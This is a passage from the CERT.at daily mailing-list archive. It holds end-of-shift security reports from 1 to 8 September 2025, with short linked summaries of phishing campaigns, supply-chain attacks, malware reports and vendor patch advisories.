dieses Supply-Chain-Angriffs scheint eine erfolgreiche Phishing Attacke gegen den Maintainer dieser Pakete und dessen NPM Konto gewesen zu sein. Manipulierte Versionen der betroffenen Pakete wurden bereits zurückgezogen. --------------------------------------------- https://www.cert.at/de/aktuelles/2025/9/populare-javascript-pakete-manipuli… ∗∗∗ September 2025 Security Update ∗∗∗ --------------------------------------------- Ivanti is disclosing vulnerabilities in Ivanti Endpoint Manager (EPM) and Ivanti Connect Secure, Policy Secure, ZTA Gateways and Neurons for Secure Access. --------------------------------------------- https://www.ivanti.com/blog/september-2025-security-update ∗∗∗ SAP Security Patch Day – September 2025 ∗∗∗ --------------------------------------------- SAP has released its September 2025 security patch package containing 26 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes four HotNews vulnerabilities with CVSS ratings up to 10.0, four High priority issues, sixteen Medium priority fixes, and two Low priority updates. The patches affect NetWeaver AS Java, S/4HANA, SAP HCM, Business Planning and Consolidation, Commerce Cloud, and SAP Business One. --------------------------------------------- https://redrays.io/blog/sap-security-patch-day-september-2025/ ∗∗∗ VU#461364: Hiawatha open-source web server has multiple vulnerabilities ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/461364 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 08.09.2025
by Daily end-of-shift report 08 Sep '25

08 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 05-09-2025 18:00 − Montag 08-09-2025 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ iCloud Calendar abused to send phishing emails from Apple’s servers ∗∗∗ --------------------------------------------- iCloud Calendar invites are being abused to send callback phishing emails disguised as purchase notifications directly from Apple's email servers, making them more likely to bypass spam filters to land in targets' inboxes. --------------------------------------------- https://www.bleepingcomputer.com/news/security/icloud-calendar-abused-to-se… ∗∗∗ Fraunhofer SIT gibt auf: Die Volksverschlüsselung wird eingestellt ∗∗∗ --------------------------------------------- Die Volksverschlüsselung, eine gemeinsame Initiative des Fraunhofer-Instituts für Sichere Informationstechnologie (SIT) und der Deutschen Telekom, wird nach rund zehnjährigem Bestehen zum 31. Januar 2026 eingestellt. Das geht aus einer Mitteilung auf der zugehörigen Webseite(öffnet im neuen Fenster) hervor. Ziel der Volksverschlüsselung war es, Ende-zu-Ende-verschlüsselte Kommunikation benutzerfreundlicher zu machen. Doch das Projekt stieß schon zum Start auf Kritik. --------------------------------------------- https://www.golem.de/news/fraunhofer-sit-gibt-auf-die-volksverschluesselung… ∗∗∗ Noisy Bear Campaign Targeting Kazakhstan Energy Sector Outed as a Planned Phishing Test ∗∗∗ --------------------------------------------- A threat actor possibly of Russian origin has been attributed to a new set of attacks targeting the energy sector in Kazakhstan. The activity, codenamed Operation BarrelFire, is tied to a new threat group tracked by Seqrite Labs as Noisy Bear. The threat actor has been active since at least April 2025. --------------------------------------------- https://thehackernews.com/2025/09/noisy-bear-targets-kazakhstan-energy.html ∗∗∗ GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms ∗∗∗ --------------------------------------------- Cybersecurity researchers have detailed a new sophisticated malware campaign that leverages paid ads on search engines like Google to deliver malware to unsuspecting users looking for popular tools like GitHub Desktop. While malvertising campaigns have become commonplace in recent years, the latest activity gives it a little twist of its own: Embedding a GitHub commit into a page URL containing altered links that point to attacker-controlled infrastructure. --------------------------------------------- https://thehackernews.com/2025/09/gpugate-malware-uses-google-ads-and.html ∗∗∗ Netflix-Phishing-Mail im Umlauf ∗∗∗ --------------------------------------------- Derzeit kursiert eine E-Mail, die angeblich von Netflix stammt. Darin wird behauptet, eine Aktualisierung der Kontodaten sei erforderlich. Andernfalls würden 8,99 € fällig und der Zugang würde eingeschränkt werden. Vorsicht: Es handelt sich um eine Fälschung! Die Nachricht führt auf eine Phishing-Website, über die Kriminelle versuchen, Kontodaten zu stehlen. --------------------------------------------- https://www.watchlist-internet.at/news/netflix-phishing-mail-im-umlauf-1/ ∗∗∗ Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs ∗∗∗ --------------------------------------------- The intrusion began in September 2024 with a download of a malicious file mimicking the EarthTime application by DeskSoft. Upon execution, SectopRAT was deployed which opened a connection to its command and control (C2) infrastructure. The threat actor established persistence by relocating the malicious file and placing a shortcut in the Startup folder, configured to trigger on user logon. They further elevated access by creating a new local account and assigning it local administrative privileges. --------------------------------------------- https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-con… ∗∗∗ GhostAction Attack Steals 3,325 Secrets from GitHub Projects ∗∗∗ --------------------------------------------- On September 2, 2025, a GitHub user known as Grommash9 committed a new workflow file to the FastUUID project. The file, labelled “Github Actions Security,” appeared similar to routine automation scripts but was later found to contain malicious code designed to collect CI/CD secrets and send them to an external server. --------------------------------------------- https://hackread.com/ghostaction-attack-steals-github-projects-secrets/ ∗∗∗ Lazarus Group Deploys Malware With ClickFix Scam in Fake Job Interviews ∗∗∗ --------------------------------------------- A recent investigation by SentinelLABS and internet intelligence platform Validin reveals that North Korean threat actors behind the Contagious Interview campaign are actively abusing public cybersecurity platforms like Validin, Maltrail, and VirusTotal to improve their malicious activities. --------------------------------------------- https://hackread.com/lazarus-group-malware-clickfix-scam-fake-job-interview/ ∗∗∗ MostereRAT Deployed AnyDesk/TightVNC for Covert Full Access ∗∗∗ --------------------------------------------- FortiGuard Labs recently discovered a phishing campaign that employs multiple advanced evasion techniques. These include the use of an Easy Programming Language (EPL) to develop a staged payload, concealing malicious operations and disabling security tools to prevent alert triggers, securing Command and Control (C2) communications using mutual TLS (mTLS), supporting various methods for deploying additional payloads, and even installing popular remote access tools to grant attackers complete control over the compromised system. --------------------------------------------- https://feeds.fortinet.com/~/924516446/0/fortinet/blogs~MostereRAT-Deployed… ∗∗∗ Ecovacs Deebot: Angreifer können beliebigen Code einschleusen ∗∗∗ --------------------------------------------- Schwachstellenbeschreibungen vom Wochenende erörtern teils hochriskante Sicherheitslücken in Staubsaugerrobotern aus dem Hause Ecovacs. Für die betroffenen Deebot-Modelle stehen bereits seit einiger Zeit Updates bereit, die die Sicherheitslecks abdichten. Besitzer sollten sicherstellen, die Basisstationen und Saugroboter auf den aktuellen Stand zu bringen. --------------------------------------------- https://heise.de/-10636233 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (chromium, libhtp, modsecurity-apache, shibboleth-sp, and wireless-regdb), Fedora (chromium, kea, tcpreplay, and yq), Mageia (rootcerts, nspr, nss & firefox and thunderbird), Red Hat (python3), and SUSE (7zip, chromedriver, go1.25, libQt5Pdf5, libsixel-bash-completion, libsoup2, libwireshark18, netty, rav1e, and trivy). --------------------------------------------- https://lwn.net/Articles/1037157/ ∗∗∗ RICOH Streamline NX vulnerable to tampering with operation history ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN75307484/ ∗∗∗ CVE-2025-8699: NFC Card Vulnerability Exploitation Leading to Free Top-Up in KioSoft "Stored Value" Unattended Payment Solution ∗∗∗ --------------------------------------------- https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-e… ∗∗∗ Beckhoff Security Advisory 2025-001: CVE-2025-41701 ∗∗∗ --------------------------------------------- https://download.beckhoff.com/download/document/product-security/Advisories… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 05.09.2025
by Daily end-of-shift report 05 Sep '25

05 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 04-09-2025 18:00 − Freitag 05-09-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ The number of mis-issued 1.1.1.1 certificates grows. Here’s the latest. ∗∗∗ --------------------------------------------- Everything to know about the mishap that threatened to expose millions of users queries. --------------------------------------------- https://arstechnica.com/information-technology/2025/09/the-number-of-mis-is… ∗∗∗ Max severity Argo CD API flaw leaks repository credentials ∗∗∗ --------------------------------------------- An Argo CD vulnerability allows API tokens with even low project-level get permissions to access API endpoints and retrieve all repository credentials associated with the project. --------------------------------------------- https://www.bleepingcomputer.com/news/security/max-severity-argo-cd-api-fla… ∗∗∗ Seit Mai 2024 bekannt: TP-Link bestätigt Zero-Day-Lücke in Archer-Routern ∗∗∗ --------------------------------------------- Es sind auch hierzulande angebotene TP-Link-Modelle betroffen. Angreifer können unter Umständen aus der Ferne Schadcode einschleusen. --------------------------------------------- https://www.golem.de/news/seit-mai-2024-bekannt-tp-link-bestaetigt-zero-day… ∗∗∗ IT threat evolution in Q2 2025. Mobile statistics ∗∗∗ --------------------------------------------- The report contains statistics on mobile threats (malware, adware, and unwanted software for Android) for Q2 2025, as well as a description of the most notable malware types identified during the reporting period. --------------------------------------------- https://securelist.com/malware-report-q2-2025-mobile-statistics/117349/ ∗∗∗ IT threat evolution in Q2 2025. Non-mobile statistics ∗∗∗ --------------------------------------------- The report presents statistics for Windows, macOS, IoT, and other threats, including ransomware, miners, local and web-based threats, for Q2 2025. --------------------------------------------- https://securelist.com/malware-report-q2-2025-pc-iot-statistics/117421/ ∗∗∗ SAP S/4HANA Critical Vulnerability CVE-2025-42957 Exploited in the Wild ∗∗∗ --------------------------------------------- A critical security vulnerability impacting SAP S/4HANA, an Enterprise Resource Planning (ERP) software, has come under active exploitation in the wild.The command injection vulnerability, tracked as CVE-2025-42957 (CVSS score: 9.9), was fixed by SAP as part of .. --------------------------------------------- https://thehackernews.com/2025/09/sap-s4hana-critical-vulnerability-cve.html ∗∗∗ Schwachstellen: KI- und Netzwerktechnik von Nvidia ist angreifbar ∗∗∗ --------------------------------------------- Sicherheitsupdates schließen Lücken in unter anderem Nvidias KI-Plattformen DGX und HGX. --------------------------------------------- https://www.heise.de/news/Sicherheitsluecken-Nvidia-KI-und-Netzwerktechnik-… ∗∗∗ Stealerium-Malware macht heimlich Webcam-Fotos für Erpressung ∗∗∗ --------------------------------------------- Die frei verfügbare Malware Stealerium erkennt Pornokonsum und fertigt heimlich Webcam-Aufnahmen an. Cyberkriminelle nutzen die Fotos für Erpressung. --------------------------------------------- https://www.heise.de/news/Malware-fotografiert-Nutzer-heimlich-bei-Porno-Ko… ∗∗∗ Cyberattack forces Jaguar Land Rover to tell staff to stay at home ∗∗∗ --------------------------------------------- Luxury automaker Jaguar Land Rover says employees should stay home through the weekend as it works to mitigate the impact of a cyberattack. --------------------------------------------- https://therecord.media/jaguar-land-rover-cyberattack-workers-stay-home ∗∗∗ SEO fraud-as-a-service scheme hijacks Windows servers to promote gambling websites ∗∗∗ --------------------------------------------- A malware campaign dubbed GhostRedirector by researchers at ESET attempts to compromise websites to drive traffic to gambling sites. --------------------------------------------- https://therecord.media/seo-scheme-windows-malware-gambling-sites-ghostredi… ∗∗∗ Scammers Exploit Grok AI With Video Ad Scam to Push Malware on X ∗∗∗ --------------------------------------------- Researchers at Guardio Labs have uncovered a new “Grokking” scam where attackers trick Grok AI into spreading malicious… --------------------------------------------- https://hackread.com/scammers-exploit-grok-ai-video-ad-scam-x-malware/ ∗∗∗ Microsoft erzwingt mehr Multifaktorauthentifizierung ∗∗∗ --------------------------------------------- Microsoft aktualisiert die Pläne für "Phase 2" der erzwungenen Multifaktorauthentifizierung für Azure. Am 1.10. sind mehr Dienste fällig. --------------------------------------------- https://heise.de/-10633932 ∗∗∗ Czechia Warns of Chinese Data Transfers and Remote Administration for Espionage ∗∗∗ --------------------------------------------- Czechia’s national cybersecurity watchdog has issued a warning about foreign cyber operations, focussed on Chinese data transfers and remote administration, urging both government bodies and private businesses to bolster defenses amid rising espionage campaigns tied to China and Russia. The alert, published this week by the National Cyber and I.. --------------------------------------------- https://thecyberexpress.com/czechia-warns-of-chinese-data-transfer/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (udisks2), Oracle (httpd:2.4 and kernel), Red Hat (python-requests), and SUSE (chromium, gn, dcmtk, firefox, himmelblau, nginx, perl-Authen-SASL, perl-Crypt-URandom, postgresql15, python-Django, and python-maturin). --------------------------------------------- https://lwn.net/Articles/1036907/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 04.09.2025
by Daily end-of-shift report 04 Sep '25

04 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 03-09-2025 18:00 − Donnerstag 04-09-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Mis-issued certificates for 1.1.1.1 DNS service pose a threat to the Internet ∗∗∗ --------------------------------------------- The three certificates were issued in May but only came to light Wednesday. --------------------------------------------- https://arstechnica.com/security/2025/09/mis-issued-certificates-for-1-1-1-… ∗∗∗ Automated Sextortion Spyware Takes Webcam Pics of Victims Watching Porn ∗∗∗ --------------------------------------------- A new specimen of “infostealer” malware offers a disturbing feature: It monitors a targets browser for NSFW content, then takes simultaneous screenshots and webcam photos of the victim. --------------------------------------------- https://www.wired.com/story/stealerium-infostealer-porn-sextortion/ ∗∗∗ Serientäter bekennen sich zu IT-Angriff auf Jaguar Land Rover ∗∗∗ --------------------------------------------- Drei britische Verbrecherbanden haben sich offenbar zusammengetan. Sie prahlen mit der IT-Attacke auf Jaguar Land Rover. --------------------------------------------- https://www.heise.de/news/Serientaeter-bekennen-sich-zu-IT-Angriff-auf-Jagu… ∗∗∗ Kritische Infrastrukturen: Attacken auf industrielle Kontrollsysteme möglich ∗∗∗ --------------------------------------------- Es sind wichtige Sicherheitsupdates für industrielle Kontrollsysteme von unter anderem Hitachi erschienen. Ein Patch steht aber noch aus. --------------------------------------------- https://www.heise.de/news/Kritische-Infrastrukturen-Attacken-auf-industriel… ∗∗∗ TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts ∗∗∗ --------------------------------------------- The Quad7 botnet is adding End-of-Life TP-Link routers to its arsenal and using them to steal Microsoft 365 accounts. --------------------------------------------- https://www.malwarebytes.com/blog/news/2025/09/tp-link-warns-of-botnet-infe… ∗∗∗ Microsoft-Support-Betrug: Phishing-Falle statt Online-Hilfe ∗∗∗ --------------------------------------------- Drängt ein Pop-up-Fenster zu einem Anruf bei der Microsoft-Helpline, ist allerhöchste Vorsicht angesagt! Hinter der Aufforderung warten nämlich keine IT-Expert:innen darauf, bei Computerproblemen weiterzuhelfen. Vielmehr wollen Kriminelle auf diesem Weg Zugriff auf das Konto ihrer Opfer bekommen. --------------------------------------------- https://www.watchlist-internet.at/news/microsoft-support-betrug/ ∗∗∗ Scattered Lapsus$ Hunters Demand Google Fire Security Experts or Face Data Leak ∗∗∗ --------------------------------------------- Scattered Lapsus$ Hunters threaten Google, demanding that two security experts, Austin Larsen of Google’s Threat Intelligence Group and Charles Carmakal of Mandiant, be fired or they will leak alleged stolen Google data. --------------------------------------------- https://hackread.com/scattered-lapsus-hunters-google-fire-experts-data-leak/ ∗∗∗ 25,000 IPs Scanned Cisco ASA Devices — New Vulnerability Potentially Incoming ∗∗∗ --------------------------------------------- GreyNoise observed two scanning surges against Cisco Adaptive Security Appliance (ASA) devices in late August including more than 25,000 unique IPs in a single burst. This activity represents a significant elevation above baseline, typically registering at less than 500 IPs per day. --------------------------------------------- https://www.greynoise.io/blog/scanning-surge-cisco-asa-devices ∗∗∗ ViewState Deserialization Zero-Day Vulnerability in Sitecore Products (CVE-2025-53690) ∗∗∗ --------------------------------------------- In a recent investigation, Mandiant Threat Defense discovered an active ViewState deserialization attack affecting Sitecore deployments leveraging a sample machine key that had been exposed in Sitecore deployment guides from 2017 and earlier. An attacker leveraged the exposed ASP.NET machine keys to perform remote code .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserial… ∗∗∗ Cookie Chaos: How to bypass __Host and __Secure cookie prefixes ∗∗∗ --------------------------------------------- Browsers added cookie prefixes to protect your sessions and stop attackers from setting harmful cookies. In this post, you’ll see how to bypass cookie defenses using discrepancies in browser and .. --------------------------------------------- https://portswigger.net/research/cookie-chaos-how-to-bypass-host-and-secure… ∗∗∗ Linux Kernel SMB 0-Day Vulnerability CVE-2025-37899 Uncovered Using ChatGPT o3 ∗∗∗ --------------------------------------------- For the first time, a zero-day vulnerability in the Linux kernel has been discovered using a large language model, OpenAI’s o3. Discovered by security researcher Sean Heelan and assigned .. --------------------------------------------- https://www.upwind.io/feed/linux-kernel-smb-0-day-vulnerability-cve-2025-37… ∗∗∗ s1ngularitys Aftermath: AI, TTPs, and Impact in the Nx Supply Chain Attack ∗∗∗ --------------------------------------------- A deeper look at the Nx supply chain attack: analyzing the performance of AI-powered malware, calculating incident impact, and sharing novel TTPs for further investigation. --------------------------------------------- https://www.wiz.io/blog/s1ngularitys-aftermath ∗∗∗ Nx Investigation Reveals GitHub Actions Workflow Exploit Led to npm Token Theft, Prompting Switch to Trusted Publishing ∗∗∗ --------------------------------------------- On August 26, 2025, the JavaScript ecosystem witnessed a watershed moment in supply chain security. The popular Nx build system, with over 4.6 million weekly downloads, fell victim to an attack that stole thousands of credentials and pioneered a disturbing new technique: weaponizing AI developer tools for scaling reconnaissance and data theft.The Nx team .. --------------------------------------------- https://socket.dev/blog/nx-supply-chain-attack-investigation-github-actions… ∗∗∗ Exploit development for IBM i ∗∗∗ --------------------------------------------- At TROOPERS24, we demonstrated how IBM i systems – still widely used in enterprise environments – can be compromised in both authenticated and unauthenticated scenarios, using only built-in services and a basic understanding of the underlying mechanisms. Despite being labeled “legacy,” these systems remain active in finance, logistics, and manufacturing, often handling critical workloads with little attention paid to their security posture. --------------------------------------------- https://blog.silentsignal.eu/2025/09/04/Exploit-development-for-IBM-i/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 03.09.2025
by Daily end-of-shift report 03 Sep '25

03 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 02-09-2025 18:00 − Mittwoch 03-09-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hackers breach fintech firm in attempted $130M bank heist ∗∗∗ --------------------------------------------- Hackers tried to steal $130 million from Evertecs Brazilian subsidiary Sinqia S.A.after gaining unauthorized access to its environment on the central banks real-time payment system (Pix). --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-breach-fintech-firm-… ∗∗∗ What Is a Passkey? Here’s How to Set Up and Use Them (2025) ∗∗∗ --------------------------------------------- Passkeys were built to enable a password-free future. Heres what they are and how you can start using them. --------------------------------------------- https://www.wired.com/story/what-is-a-passkey-and-how-to-use-them/ ∗∗∗ Patchday: Kritische Schadcode-Lücke bedroht Android 15 und 16 ∗∗∗ --------------------------------------------- Wichtige Sicherheitsupdates schließen mehrere Sicherheitslücken in verschiedenen Android-Versionen. --------------------------------------------- https://www.heise.de/news/Patchday-Kritische-Schadcode-Luecke-bedroht-Andro… ∗∗∗ Phishing-Alarm: FinanzOnline droht nicht mit der Pfändung des Hausrats! ∗∗∗ --------------------------------------------- Eine höchst aktuelle Phishing-Welle im Namen von FinanzOnline sorgt für große Verunsicherung. Die zentrale Drohung: Pfändung des Hausrats durch den Gerichtsvollzieher! Klingt besorgniserregend, ist in Wahrheit aber nichts anderes als ein Betrugsversuch. Wir erklären, .. --------------------------------------------- https://www.watchlist-internet.at/news/phishing-alarm-finanzonline-pfaendun… ∗∗∗ Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust ∗∗∗ --------------------------------------------- Model namespace reuse is a potential security risk in the AI supply chain. Attackers can misuse platforms like Hugging Face for remote code execution. --------------------------------------------- https://unit42.paloaltonetworks.com/model-namespace-reuse/ ∗∗∗ Digitale Souveränität: Cloud Edition. ∗∗∗ --------------------------------------------- Das erratische Verhalten der aktuellen US-Regierung hat die Sorgen um die Abhängigkeit Europas von den großen US-Cloudbetreibern verstärkt. In der EU haben sowohl die Kommission als auch das Parlament Dokumente zu diesem Thema vorgelegt, heuer hat die Kommission bereits um Ideen zu einem Cloud and AI Development Act gebeten. Auch in Deutschland .. --------------------------------------------- https://www.cert.at/de/blog/2025/9/digitale-souveranitat-cloud-edition ∗∗∗ Cloudflare, Zscaler among companies impacted by Salesloft Drift incident ∗∗∗ --------------------------------------------- Multiple tech firms have publicly detailed how incidents involving the third-party Salesloft Drift tool have exposed customer data. --------------------------------------------- https://therecord.media/salesloft-drift-breach-cloudflare-zscaler-palo-alto… ∗∗∗ Corruption case against ousted cyber chief is ‘revenge,’ Ukraine’s security service says ∗∗∗ --------------------------------------------- Ukraine’s security service is accusing the country’s anti-corruption agencies of seeking “revenge” by bringing charges against Illia Vitiuk, the former head of the agency’s cybersecurity unit. --------------------------------------------- https://therecord.media/corruption-case-against-ousted-cyber ∗∗∗ Cloudflare Mitigates Largest Ever Recorded DDoS Attack at 11.5 Tbps ∗∗∗ --------------------------------------------- Cloudflare mitigated the largest DDoS attack ever recorded, an 11.5 Tbps flood that lasted 35 seconds without disrupting… --------------------------------------------- https://hackread.com/cloudflare-mitigates-largest-ddos-attack-11-5-tbps/ ∗∗∗ CISA, NSA and 19 International Partners Release Shared Vision of Software Bill of Materials for Cybersecurity Guide ∗∗∗ --------------------------------------------- CISA, NSA, and 19 international partners release a shared vision of Software Bill of Materials (SBOM) highlighting the importance of SBOM in securing global supply chains & enhancing software resilience worldwide. --------------------------------------------- https://www.cisa.gov/news-events/news/cisa-nsa-and-19-international-partner… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (httpd, kernel, and kernel-rt), Debian (python-eventlet and python-h2), Mageia (aide, gnutls, tomcat, and vim), Oracle (httpd, mod_http2, postgresql:15, python3.11, python3.12, python3.9, and udisks2), Red Hat (kernel, postgresql, postgresql:12, and postgresql:15), SUSE (dcmtk, jupyter-bqplot-jupyterlab, kured, libudisks2-0, munge, python-eventlet, python-future, python311-eventlet, rekor, traefik2, and ucode-intel), and Ubuntu (linux-aws, .. --------------------------------------------- https://lwn.net/Articles/1036567/ ∗∗∗ Vulnerability & Patch Roundup — August 2025 ∗∗∗ --------------------------------------------- https://blog.sucuri.net/2025/08/vulnerability-patch-roundup-august-2025.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 02.09.2025
by Daily end-of-shift report 02 Sep '25

02 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Montag 01-09-2025 18:00 − Dienstag 02-09-2025 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Zscaler data breach exposes customer info after Salesloft Drift compromise ∗∗∗ --------------------------------------------- In an advisory, Zscaler says that its Salesforce instance was impacted by this supply-chain attack, exposing customers' information. [..] This warning follows the compromise of Salesloft Drift, an AI chat agent that integrates with Salesforce, in which attackers stole OAuth and refresh tokens, enabling them to gain access to customer Salesforce environments and exfiltrate sensitive data. [..] The company stresses that the data breach only impacts its Salesforce instance and no Zscaler products, services, or infrastructure. --------------------------------------------- https://www.bleepingcomputer.com/news/security/zscaler-data-breach-exposes-… ∗∗∗ Stolen OAuth tokens expose Palo Alto customer data ∗∗∗ --------------------------------------------- Palo Alto Networks is writing to customers that may have had commercially sensitive data exposed after criminals used stolen OAuth credentials lifted from the Salesloft Drift break-in to gain entry to its Salesforce instance. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/09/02/stolen_oauth… ∗∗∗ No, Google did not warn 2.5 billion Gmail users to reset passwords ∗∗∗ --------------------------------------------- This is just the latest such story, which numerous news websites and cybersecurity companies have reported without verification in recent years. [..] However, as the company explained on a Monday blog post addressing these inaccurate stories, "Gmail's protections are strong and effective, and claims of a major Gmail security warning are false." --------------------------------------------- https://www.bleepingcomputer.com/news/technology/no-google-did-not-warn-25-… ∗∗∗ Badges, behavior, and BMS: Why the human perimeter matters in energy cybersecurity ∗∗∗ --------------------------------------------- Over the summer, a hacker brought a 158-year-old European technology company to its knees with a guessed password. By identifying a weak admin credential, the attacker gained access to internal systems and extracted sensitive information, laying the groundwork for a broader ransomware campaign. [..] Energy cybersecurity is not just about software protection —it’s also about managing human interaction and physical access to critical infrastructure. [..] Even the most secure system in the world won’t help if someone holds the door open for the wrong person. --------------------------------------------- https://blog.se.com/digital-transformation/cybersecurity/2025/09/01/badges-… ∗∗∗ Cookies and how to bake them: what they are for, associated risks, and what session hijacking has to do with it ∗∗∗ --------------------------------------------- Kaspersky experts explain the different types of cookies, how to configure them correctly, and how to protect yourself from session hijacking attacks. --------------------------------------------- https://securelist.com/cookies-and-session-hijacking/117390/ ∗∗∗ A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years, (Tue, Sep 2nd) ∗∗∗ --------------------------------------------- What can almost 2,000 sextortion messages tell us about how threat actors operate and whether they are successful? [..] The use of specific cryptocurrency addresses in sextortion messages seems to be fairly short-lived. Approximately 46% of the addresses in the dataset were only used for a single day [..] the average requested amount was 1,716 USD, with a median of 1,370 USD [..] Of the 205 cryptocurrency addresses in our dataset, only 57 (~28%) didn’t receive any payment at all, while the remaining addresses did. --------------------------------------------- https://isc.sans.edu/diary/rss/32252 ∗∗∗ Ukrainian Network FDN3 Launches Massive Brute-Force Attacks on SSL VPN and RDP Devices ∗∗∗ --------------------------------------------- Cybersecurity researchers have flagged a Ukrainian IP network for engaging in massive brute-force and password spraying campaigns targeting SSL VPN and RDP devices between June and July 2025. The activity originated from a Ukraine-based autonomous system FDN3 (AS211736), per French cybersecurity company Intrinsec. --------------------------------------------- https://thehackernews.com/2025/09/ukrainian-network-fdn3-launches-massive.h… ∗∗∗ Achtung, Bitpanda-Phishing: Krypto-Guthaben in Gefahr! ∗∗∗ --------------------------------------------- Kriminelle versenden SMS-Nachrichten und warnen vor einem angeblichen Login auf das Bitpanda-Konto des Opfers. Sie liefern außerdem eine Telefonnummer mit, bei der man sich zur Klärung melden solle. Am anderen warten allerdings die Betrüger:innen – und die haben es auf Krypto-Assets abgesehen. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-bitpanda-phishing-krypto/ ===================== = Vulnerabilities = ===================== ∗∗∗ Heimautomatisierung: ESPHome-Lücke erlaubt volle Kompromittierung ∗∗∗ --------------------------------------------- In der ESP-IDF-Plattform der ESPHome-Firmwarebasis führt eine nun entdeckte Sicherheitslücke dazu, dass Angreifer eine Authentifizierung umgehen können. Das ermöglicht ihnen sogar, eigene Firmware auf verwundbare Controller zu verfrachten. [..] Ein neuer Schwachstelleneintrag vom Montag dieser Woche erörtert die Sicherheitslücke in der Firmware. [..] (CVE-2025-57808 / noch kein EUVD, CVSS 8.1, Risiko "hoch") --------------------------------------------- https://www.heise.de/news/Heimautomatisierung-ESPHome-Luecke-erlaubt-volle-… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, mod_http2, postgresql, postgresql:15, and python39:3.9), Debian (libsndfile), Mageia (ceph, glibc, and golang), Oracle (postgresql and python39:3.9), Red Hat (aide, postgresql:12, postgresql:13, postgresql:15, and postgresql:16), SUSE (git, govulncheck-vulndb, jetty-minimal, nginx, python-future, and ruby2.5), and Ubuntu (imagemagick). --------------------------------------------- https://lwn.net/Articles/1036369/ ∗∗∗ TYPO3-EXT-SA-2025-011: Command Injection in extension "TYPO3 Backup Plus" (ns_backup) ∗∗∗ --------------------------------------------- https://typo3.org/security/advisory/typo3-ext-sa-2025-011 ∗∗∗ Delta Electronics EIP Builder ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-245-01 ∗∗∗ SunPower PVS6 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-245-03 ∗∗∗ Fuji Electric FRENIC-Loader 4 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-245-02 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 01.09.2025
by Daily end-of-shift report 01 Sep '25

01 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 29-08-2025 18:00 − Montag 01-09-2025 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Transparenz und Kommunikation: BSI rät indirekt von weiterer Paypal-Nutzung ab ∗∗∗ --------------------------------------------- Was passiert mit den Daten, werden bei Ausfällen Gründe genannt? Ohne Paypal zu nennen, ruft das BSI auf, nicht nur nach der Usability auszuwählen. --------------------------------------------- https://www.golem.de/news/transparenz-und-kommunikation-bsi-raet-indirekt-v… ∗∗∗ AWS warnt: Russische Hacker bei Attacken auf Microsoft-Nutzer erwischt ∗∗∗ --------------------------------------------- Die berüchtigte Hackergruppe APT29 soll bestehende Webseiten mit Schadcode verseucht haben, um an die Microsoft-Konten der Besucher zu gelangen. --------------------------------------------- https://www.golem.de/news/aws-warnt-russische-hacker-bei-attacken-auf-micro… ∗∗∗ Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling ∗∗∗ --------------------------------------------- Cybersecurity researchers have called attention to a cyber attack in which unknown threat actors deployed an open-source endpoint monitoring and digital forensic tool called Velociraptor, illustrating ongoing abuse of legitimate software for malicious purposes. --------------------------------------------- https://thehackernews.com/2025/08/attackers-abuse-velociraptor-forensic.html ∗∗∗ Traffic to government domains often crosses national borders, or flows through risky bottlenecks ∗∗∗ --------------------------------------------- Sites at yourcountry.gov may also not bother with HTTPs Internet traffic to government domains often flows across borders, relies on a worryingly small number of network 